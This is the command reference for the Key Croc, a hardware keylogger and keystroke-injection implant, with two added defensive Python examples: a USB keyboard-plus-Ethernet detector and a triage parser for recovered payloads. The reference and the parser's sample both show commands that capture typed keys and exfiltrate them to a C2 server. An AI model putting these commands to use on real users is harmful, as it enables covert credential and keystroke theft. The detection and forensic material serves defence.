Key Croc payloads are easy to write with Ducky Script. They can be written in any standard text editor, from Notepad on Windows to TextEdit on a Mac, or even nano on Linux, the best text editor ever. These simple ASCII files are processed by the Key Croc's payload framework. Payloads execute when the target types specified patterns of keystrokes. A payload can be as simple as saving keystrokes of interest, or as advanced as an array of attacks using multiple device emulation modes, complex pentest frameworks and specialized exploits.
Multiple payloads, each with a unique file name, may be loaded simultaneously from the Key Croc's udisk payloads folder.
In addition to Ducky Script, Key Croc payloads are executed with bash, which means they can leverage this powerful shell scripting language. For example, conditional statements can be used to construct decision trees based on events, and text processing tools can be used to systematically extract typed key sequences of interest, storing them in variables for use later in the payload.
Payloads can take advantage of a number of Key Croc commands, in addition to the standard Linux tools, additional pre-installed tools like nmap and smbclient, and optionally installed tools like metasploit, responder and impacket.
Included Ducky Script Commands
- MATCH – specifies a pattern that must be typed to trigger payload execution
- SAVEKEYS – saves next or last typed keys to a specified file when a MATCH is found
- QUACK – injects keystrokes using Ducky Script 2.0
- QUACKFILE – injects keystrokes from specified file
- ATTACKMODE – specifies which device type to emulate
- LED – controls the multi-color LED
- GET_VARS – returns useful variables for use in payload
Payload Control & Development
- RELOAD_PAYLOADS – instructs the payload framework to reingest payloads from disk
- CHECK_PAYLOADS – checks the MATCH and SAVEKEYS syntax of the loaded payloads
- RECORD_PAYLOAD – interactive payload recorder
- ENABLE_PAYLOAD – enables payload
- DISABLE_PAYLOAD – disables payload
- INSTALL_EXTRAS – installs optional third party tools
- KEYBOARD – reports if a keyboard is present or missing
- udisk – mount, unmount and format the udisk partition
- WAIT_FOR_KEYBOARD_ACTIVITY – halts payload until keyboard activity is detected
- WAIT_FOR_KEYBOARD_INACTIVITY – halts payload until keyboard is inactive for specified time
- WAIT_FOR_LOOT – halts payload until specified loot is received
Cloud C2 Commands
- C2NOTIFY – sends a notification to the configured Cloud C2 server
- C2EXFIL – sends a file to the configured Cloud C2 server
Command Quick Reference
MATCH <string or regular expression>
Will trigger payload execution when specified pattern is typed.
See the MATCH article for full usage.
SAVEKEYS </path/to/file> <NEXT | LAST> <number of keystrokes 1-255>
SAVEKEYS /root/loot/test.log NEXT 6
Will save the specified number of keys to a file – either before (LAST) or after (NEXT) the payload MATCH.
See the SAVEKEYS article for full usage.
QUACK <keystrokes to inject>
QUACK STRING hello world
Will inject keystrokes specified. See the QUACK article for full usage.
QUACKFILE </path/to/file>
Will inject keystrokes from the specified file. Ducky Script commands in the specified file should not be prefixed with Q or QUACK.
ATTACKMODE <modes> <options>
ATTACKMODE HID ECM_ETHERNET VID_0X05AC PID_0X021E MAN_Hak5 SN_1337
Will emulate a USB device from the specified modes and options. See the ATTACKMODE article for full usage.
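An Ethernet ATTACKMODE makes the same physical device enumerate as both a HID keyboard and a CDC Ethernet (ECM) adapter, usually under the VID/PID cloned from the attached keyboard. That combination is what a host-side check can look for. The following is an added example, not Hak5 code: it reads real USB descriptors from sysfs on a Linux host (the `idVendor`, `idProduct`, `bInterfaceClass`, `bInterfaceSubClass` and `bInterfaceProtocol` attributes under `/sys/bus/usb/devices`) and falls back to a constructed sample when sysfs is not available; the sample device paths and the non-Apple VID/PID values are made up, while the `05ac:021e` pair is the one from the ATTACKMODE example above.

```python
"""Flag USB devices that expose both a keyboard interface and a CDC ECM
network interface, the shape an Ethernet ATTACKMODE produces.
Added example, not Hak5 code. SAMPLE_DEVICES is constructed data."""
import os
from dataclasses import dataclass, field
from typing import Dict, List

# USB-IF class, subclass and protocol codes used below
USB_CLASS_CDC = 0x02          # Communications Device Class
USB_CLASS_HID = 0x03          # Human Interface Device
CDC_SUBCLASS_ECM = 0x06       # Ethernet Control Model
HID_PROTOCOL_KEYBOARD = 0x01  # boot-protocol keyboard


@dataclass
class Interface:
    cls: int
    subclass: int
    protocol: int


@dataclass
class UsbDevice:
    path: str  # sysfs bus path such as "1-2"
    vid: int
    pid: int
    interfaces: List[Interface] = field(default_factory=list)


def _read_hex(path: str) -> int:
    """Read a hexadecimal sysfs attribute; a missing or malformed file reads as 0."""
    try:
        with open(path) as fh:
            return int(fh.read().strip(), 16)
    except (OSError, ValueError):
        return 0


def scan_sysfs(root: str = "/sys/bus/usb/devices") -> List[UsbDevice]:
    """Build UsbDevice records from sysfs; empty list where sysfs is absent."""
    devices: List[UsbDevice] = []
    if not os.path.isdir(root):
        return devices
    for name in sorted(os.listdir(root)):
        dev_dir = os.path.join(root, name)
        # interface entries are named "<device>:<config>.<iface>"; handle them below
        if ":" in name or not os.path.isfile(os.path.join(dev_dir, "idVendor")):
            continue
        dev = UsbDevice(name, _read_hex(os.path.join(dev_dir, "idVendor")),
                        _read_hex(os.path.join(dev_dir, "idProduct")))
        for child in sorted(os.listdir(dev_dir)):
            if child.startswith(name + ":"):
                idir = os.path.join(dev_dir, child)
                dev.interfaces.append(Interface(
                    _read_hex(os.path.join(idir, "bInterfaceClass")),
                    _read_hex(os.path.join(idir, "bInterfaceSubClass")),
                    _read_hex(os.path.join(idir, "bInterfaceProtocol"))))
        devices.append(dev)
    return devices


def is_keyboard(iface: Interface) -> bool:
    return iface.cls == USB_CLASS_HID and iface.protocol == HID_PROTOCOL_KEYBOARD


def is_ecm(iface: Interface) -> bool:
    return iface.cls == USB_CLASS_CDC and iface.subclass == CDC_SUBCLASS_ECM


def find_keyboard_nics(devices: List[UsbDevice]) -> List[Dict[str, str]]:
    """One finding per device that is both a keyboard and an ECM Ethernet adapter."""
    findings = []
    for dev in devices:
        if any(map(is_keyboard, dev.interfaces)) and any(map(is_ecm, dev.interfaces)):
            findings.append({"path": dev.path, "vid": f"{dev.vid:04x}", "pid": f"{dev.pid:04x}"})
    return findings


# Constructed sample shaped like a sysfs scan (paths and the first/last VID:PID are
# made up). The composite device borrows the 05ac:021e identity from the ATTACKMODE
# example; since the Key Croc clones the attached keyboard's VID/PID, the identity
# alone proves nothing and the interface mix is the signal.
SAMPLE_DEVICES = [
    UsbDevice("1-1", 0x046d, 0xc31c, [Interface(USB_CLASS_HID, 0x01, HID_PROTOCOL_KEYBOARD)]),
    UsbDevice("1-2", 0x05ac, 0x021e, [Interface(USB_CLASS_HID, 0x01, HID_PROTOCOL_KEYBOARD),
                                      Interface(USB_CLASS_CDC, CDC_SUBCLASS_ECM, 0x00),
                                      Interface(0x0a, 0x00, 0x00)]),  # CDC-Data companion
    UsbDevice("1-3", 0x0bda, 0x8153, [Interface(0xff, 0xff, 0x00)]),   # vendor-class NIC
]

if __name__ == "__main__":
    for hit in find_keyboard_nics(scan_sysfs() or SAMPLE_DEVICES):
        print(f"keyboard+Ethernet composite at {hit['path']} ({hit['vid']}:{hit['pid']})")
```

This is a triage signal rather than a verdict: some docking stations and multi-function devices legitimately present a keyboard alongside a network interface, and a Key Croc running in a HID-only ATTACKMODE shows no ECM interface at all. Correlating a new ECM interface with a keyboard re-enumeration (the device re-plugs when the ATTACKMODE changes) is the stronger host-side indicator.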
LED
Will control the multi-color LED. See the LED article for full usage.
GET_VARS
Will return a set of useful variables which may be referenced in the payload:
- $VID – Vendor ID cloned from attached keyboard or specified in config.txt
- $PID – Product ID cloned from attached keyboard or specified in config.txt
- $MAN – Manufacturer specified in config.txt
- $SN – Serial number specified in config.txt
- $PROD – Product string specified in config.txt
- $HOST_IP – IP address of Key Croc after executing an Ethernet ATTACKMODE
- $TARGET_IP – IP address of target after executing an Ethernet ATTACKMODE
- $TARGET_HOSTNAME – Host name of the target after executing an Ethernet ATTACKMODE
Note: The $LOOT variable is always available after MATCH triggers the payload. See the MATCH article for $LOOT details.
RELOAD_PAYLOADS
Will refresh the Key Croc framework with payload files from /root/udisk/payloads/
CHECK_PAYLOADS
Will check the syntax of the payloads currently residing in /root/udisk/payloads/
RECORD_PAYLOAD
Will parse each line entered, enabling interactive payload development with helpers.
ENABLE_PAYLOAD <payload>
Will enable the specified payload. After enabling a payload, issue RELOAD_PAYLOADS for the change to take effect.
DISABLE_PAYLOAD <payload>
Will disable the specified payload. After disabling a payload, issue RELOAD_PAYLOADS for the change to take effect.
INSTALL_EXTRAS
Will install additional third party software such as metasploit, impacket and responder to the /tools/ directory.
KEYBOARD
Will return PRESENT or MISSING depending on whether a keyboard is attached.
udisk [ mount | unmount | remount | reformat ]
Will mount, unmount, remount or reformat the udisk partition.
WAIT_FOR_KEYBOARD_ACTIVITY <refresh interval in seconds>
WAIT_FOR_KEYBOARD_ACTIVITY 1
Will check for keyboard activity at each specified interval, halting further payload execution until keyboard activity is detected. The example waits until there is keyboard activity within a 1 second window.
WAIT_FOR_KEYBOARD_INACTIVITY <seconds of inactivity required>
WAIT_FOR_KEYBOARD_INACTIVITY 300
Will check for keyboard inactivity, halting further payload execution until the specified time has elapsed with no keyboard activity. The example waits until there have been no keypresses for 5 minutes (300 seconds).
WAIT_FOR_LOOT </path/to/file> (optional)<refresh interval in seconds>
WAIT_FOR_LOOT /root/loot/captured_keys.txt 5
Will wait for the specified file to exist, or if it already exists, for its line count to increase, halting further payload execution until then. Can be used in conjunction with SAVEKEYS NEXT, which writes the loot file once the specified number of keys has been typed. The example waits until the captured_keys.txt file exists, checking every 5 seconds.
C2NOTIFY <INFO|WARN|ERROR> <MESSAGE>
C2NOTIFY INFO 'The cake is a lie'
Will send a notification to the configured Cloud C2 server. See the Configuring Cloud C2 article.
C2EXFIL [STRING] <PATH> [SOURCE]
C2EXFIL STRING /root/loot/captured_keys.txt My_Payload
Will exfiltrate the specified file to the configured Cloud C2 server. PATH is required; the STRING keyword and the SOURCE label are optional. See the Configuring Cloud C2 article.
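When a Key Croc is recovered during an investigation, the first question is what its payloads would have done on the host. The following is an added example, not Hak5 code: a small triage parser for the command syntax in this quick reference (MATCH, SAVEKEYS, QUACK/QUACKFILE, ATTACKMODE, C2NOTIFY, C2EXFIL) that summarises each payload file's trigger patterns, loot destinations, emulated USB identity and Cloud C2 use, and flags SAVEKEYS and C2EXFIL lines that do not fit the documented syntax. Lines that are not Ducky Script commands are counted as bash, per the note above that payloads are executed with bash. The `SAMPLE_PAYLOAD` text is constructed from the examples on this page and is not a real payload; the assumption that Python's `re` approximates the device's MATCH pattern syntax is noted in the code.

```python
"""Triage parser for Ducky Script payloads found in a Key Croc udisk payloads
folder. Added example, not Hak5 code. SAMPLE_PAYLOAD is constructed."""
import re
from typing import Any, Dict

# Commands from the quick reference that need no summary entry of their own
PASSIVE_COMMANDS = {
    "LED", "GET_VARS", "WAIT_FOR_LOOT", "WAIT_FOR_KEYBOARD_ACTIVITY",
    "WAIT_FOR_KEYBOARD_INACTIVITY", "RELOAD_PAYLOADS", "CHECK_PAYLOADS",
    "RECORD_PAYLOAD", "ENABLE_PAYLOAD", "DISABLE_PAYLOAD", "INSTALL_EXTRAS",
    "KEYBOARD", "udisk",
}
# ATTACKMODE options that override the emulated USB identity (VID_..., PID_..., ...)
USB_IDENTITY_OPTION = re.compile(r"^(VID|PID|MAN|SN|PROD)_(.+)$")


def parse_payload(text: str) -> Dict[str, Any]:
    """Summarise one payload file; 'errors' lists lines that break the documented syntax."""
    summary: Dict[str, Any] = {
        "triggers": [],          # MATCH patterns that start the payload
        "loot_files": [],        # SAVEKEYS destinations on the device
        "attack_modes": [],      # device types named in ATTACKMODE
        "usb_identity": {},      # VID/PID/MAN/SN/PROD overrides
        "injects_keystrokes": False,
        "c2_notify": [],
        "c2_exfil": [],          # files sent to Cloud C2
        "bash_lines": 0,         # lines handed to bash rather than the Ducky parser
        "errors": [],
    }
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        cmd, *args = line.split()
        if cmd == "MATCH":
            pattern = line[len("MATCH"):].strip()
            # MATCH takes a string or regular expression; Python's re is only an
            # approximation of the device's regex dialect (assumption), used to
            # catch patterns that are obviously broken.
            try:
                re.compile(pattern)
            except re.error as exc:
                summary["errors"].append(f"line {lineno}: MATCH pattern does not compile ({exc})")
            summary["triggers"].append(pattern)
        elif cmd == "SAVEKEYS":
            ok = (len(args) == 3 and args[1] in ("NEXT", "LAST")
                  and args[2].isdigit() and 1 <= int(args[2]) <= 255)
            if ok:
                summary["loot_files"].append({"path": args[0], "when": args[1], "count": int(args[2])})
            else:
                summary["errors"].append(
                    f"line {lineno}: SAVEKEYS expects </path/to/file> <NEXT|LAST> <1-255>")
        elif cmd in ("Q", "QUACK", "QUACKFILE"):
            summary["injects_keystrokes"] = True
        elif cmd == "ATTACKMODE":
            for arg in args:
                m = USB_IDENTITY_OPTION.match(arg)
                if m:
                    summary["usb_identity"][m.group(1)] = m.group(2)
                else:
                    summary["attack_modes"].append(arg)
        elif cmd == "C2NOTIFY":
            summary["c2_notify"].append(" ".join(args))
        elif cmd == "C2EXFIL":
            paths = [a for a in args if a != "STRING"]  # STRING keyword is optional
            if paths:
                summary["c2_exfil"].append(paths[0])
            else:
                summary["errors"].append(f"line {lineno}: C2EXFIL requires a <PATH>")
        elif cmd in PASSIVE_COMMANDS:
            continue
        else:
            summary["bash_lines"] += 1
    return summary


# Constructed sample assembled from the examples in the quick reference above.
SAMPLE_PAYLOAD = """\
# constructed sample for triage, not a real payload
MATCH hello world
SAVEKEYS /root/loot/captured_keys.txt NEXT 6
WAIT_FOR_LOOT /root/loot/captured_keys.txt 5
ATTACKMODE HID ECM_ETHERNET VID_0X05AC PID_0X021E MAN_Hak5 SN_1337
GET_VARS
echo "target is $TARGET_IP" >> /root/loot/notes.txt
C2EXFIL STRING /root/loot/captured_keys.txt My_Payload
C2NOTIFY INFO 'The cake is a lie'
"""

if __name__ == "__main__":
    for key, value in parse_payload(SAMPLE_PAYLOAD).items():
        print(f"{key}: {value}")
```

Run it over every file in the recovered payloads folder; the `loot_files` and `c2_exfil` entries tell an incident responder which paths on the udisk to preserve and whether captured keystrokes may already have left the device, while `usb_identity` records which VID/PID the device presented so host USB logs can be searched for the same pair.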